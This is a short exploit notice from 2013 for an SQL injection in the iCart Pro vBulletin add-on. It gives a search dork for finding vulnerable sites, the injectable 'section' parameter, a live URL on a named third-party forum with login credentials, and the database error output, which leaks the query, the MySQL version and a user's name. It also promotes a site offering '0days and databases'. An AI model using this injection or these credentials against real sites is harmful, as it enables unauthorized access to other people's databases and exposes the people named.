# Exploit Title: vbcovor ICART SQLI
# Date: 25/01/2013
# Author(s): n3tw0rk
# Contact: Mail:infectedelite@gmail.com
# Product: iCart Pro
# Software Version 4.0.1
# Product Download: http://www.vbcover.com/icart.php?do=product&productid=61
# Google Dork: inurlicart.php
# Require Editting product access for SQL error admin account will work
# Exploit link:icart.php?do=editproduct&productid=[product ID]§ion='
Live link:https://www.rostyles.com/forum/icart.php?do=editproduct&productid=19§ion='
(requires admin access login test:1234)
Database error in vBulletin 4.2.0:
Invalid SQL:
SELECT name, ' FROM covercartproduct WHERE id = '19';
MySQL Error : You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to
use near '19'' at line 1
Error Number : 1064
Request Date : Friday, January 25th 2013 @ 06:46:30 AM
Error Date : Friday, January 25th 2013 @ 06:46:31 AM
Script :
http://www.rostyles.com/forum/icart.php?do=editproduct&productid=19§ion='
Referrer :
IP Address :
Username : Teascu Dorin
Classname : vB_Database
MySQL Version : 5.0.96-log
Shouts to: Teoz, n0tch, shadow008. http://myupdatezone.com for more
0days and databases
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this informatio